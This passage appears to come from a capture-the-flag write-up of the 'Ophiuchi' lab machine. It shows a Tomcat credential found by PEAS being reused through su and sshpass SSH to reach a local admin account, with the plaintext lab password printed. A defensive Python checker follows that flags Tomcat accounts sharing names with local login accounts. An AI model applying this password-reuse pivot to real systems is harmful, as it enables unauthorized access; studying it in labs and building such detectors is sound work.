admin


PEAS extracted a credential used to authenticate to the target Tomcat instance: admin:whythereisalimit. Coincidentally, there is a user named admin on the system as well. I should test the credential for password reuse.

tomcat@ophiuchi:~$ su admin
password: whythereisalimit
 
admin@ophiuchi:/opt/tomcat$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

Password reuse confirmed. Since there is an SSH server running on the target system, I will connect back to it via SSH.

┌──(kali㉿kali)-[~/…/htb/labs/ophiuchi/yaml-payload]
└─$ sshpass -p 'whythereisalimit' ssh admin@$IP
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of wed 29 mar 2023 04:20:18 PM UTC
 
  system load:             0.12
  usage of /:              20.0% of 27.43GB
  memory usage:            18%
  swap usage:              0%
  processes:               221
  users logged in:         0
  ipv4 address for ens160: 10.10.10.227
  ipv6 address for ens160: dead:beef::250:56ff:feb9:3d0d
 
 
176 updates can be installed immediately.
56 of these updates are security updates.
to see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
 
last login: Mon Jan 11 08:23:12 2021 from 10.10.14.2
admin@ophiuchi:~$ whoami
admin
admin@ophiuchi:~$ hostname
ophiuchi
admin@ophiuchi:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.227  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:3d0d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:3d0d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:3d:0d  txqueuelen 1000  (Ethernet)
        RX packets 14418  bytes 5007345 (5.0 MB)
        RX errors 0  dropped 110  overruns 0  frame 0
        TX packets 4091  bytes 2008300 (2.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 49042  bytes 3493930 (3.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 49042  bytes 3493930 (3.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement made to the admin user via SSH.
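
A defender-side check for the condition that made this work, as an added example that is not part of the original notes: it flags Tomcat application accounts whose names match local login accounts, the pairing where a reused password turns into a shell. Reading the accounts from conf/tomcat-users.xml is an assumption, as are the constructed file contents and the function names.

```python
import xml.etree.ElementTree as ET

# Constructed sample inputs; the real password is deliberately not reproduced.
TOMCAT_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <user username="admin" password="PLACEHOLDER-1" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="PLACEHOLDER-2" roles="manager-script"/>
</tomcat-users>"""

PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
admin:x:1000:1000:,,,:/home/admin:/bin/bash
tomcat:x:1001:1001::/opt/tomcat:/bin/bash
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def tomcat_usernames(xml_text):
    """Usernames defined in tomcat-users.xml content (namespaced or not)."""
    names = set()
    for el in ET.fromstring(xml_text).iter():
        # Strip an XML namespace prefix such as {http://tomcat.apache.org/xml}
        if el.tag.rsplit("}", 1)[-1] == "user" and el.get("username"):
            names.add(el.get("username"))
    return names


def login_accounts(passwd_text):
    """Map of local account name -> shell for accounts that can log in."""
    accounts = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NON_LOGIN_SHELLS:
            accounts[fields[0]] = fields[6]
    return accounts


def reuse_candidates(xml_text, passwd_text):
    """Application accounts that share a name with a local login account."""
    local = login_accounts(passwd_text)
    return sorted(tomcat_usernames(xml_text) & set(local))


if __name__ == "__main__":
    for name in reuse_candidates(TOMCAT_USERS_XML, PASSWD):
        print(f"[!] '{name}' is both a Tomcat user and a local login account: "
              "rotate both passwords and confirm they differ")
```

A name match does not prove the passwords are the same; it identifies the accounts whose credentials should be rotated and compared first.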